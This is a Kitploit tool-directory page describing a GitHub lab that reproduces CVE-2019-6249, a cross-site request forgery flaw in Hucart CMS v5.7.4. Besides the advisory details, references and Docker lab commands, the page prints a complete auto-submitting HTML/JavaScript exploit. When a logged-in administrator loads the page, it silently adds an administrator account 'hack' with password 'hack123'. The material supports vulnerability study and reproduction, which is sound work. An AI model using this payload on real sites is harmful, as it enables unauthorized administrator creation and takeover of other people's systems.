Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2019-6249_Hucart-cms — CVE-2019-6249 Hucart cms 复现环境 | Kitploit
Tools/GitHubGitHub/alphabugx/cve-2019-6249_hucart-cms
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubalphabugx/cve-2019-6249_hucart-cms

CVE-2019-6249_Hucart-cms

CVE-2019-6249 Hucart cms 复现环境

View Repository
124 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2019-6249_Hucart cms

I. Vulnerability Summary

Vulnerability Name: CSRF vulnerability in Hucart cms v5.7.4 allows arbitrary addition of administrator accounts
Disclosure Date: 2019-01-13
Discovered by: AllenChen ([email protected])
Product Homepage: http://www.hucart.com/
Software Link: http://www.hucart.com/
Version: v5.7.4
CVE ID: CVE-2019-6249\

II. Vulnerability Overview

Hucart cms v5.7.4 has a CSRF vulnerability. When an administrator is logged in and visits the CSRF test page below, a new administrator account named "hack" can be added.

III. Exploit Code

The exploit code is as follows: Adds an administrator account with username "hack" and password "hack123".

<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='adm_user' value='hack' />";
fields += "<input type='hidden' name='adm_email' value='[email protected]' />";  
fields += "<input type='hidden' name='adm_mobile' value='13888888888' />";  
fields += "<input type='hidden' name='adm_pwd' value='hack123' />";  
fields += "<input type='hidden' name='re_adm_pwd' value='hack123' />";  
fields += "<input type='hidden' name='adm_enabled' value='1' />";  
fields += "<input type='hidden' name='act_type' value='add' />";  
fields += "<input type='hidden' name='adm_id' value='' />";  

var url = "http://localhost/hucart_cn/adminsys/index.php?load=admins&act=edit_info&act_type=add";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>

IV. References

  • CVE Chinese Application Site: http://www.iwantacve.cn/index.php/archives/109/
  • CVE Official: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6249
  • exploit-db: https://www.exploit-db.com/exploits/46149

V. Environment Reproduction (Docker)

Run the following commands in a Docker environment

docker built -t hucart -f Dockerfile .
docker run -d -p 80:80 hucart

Original Email: [email protected]

Download Tool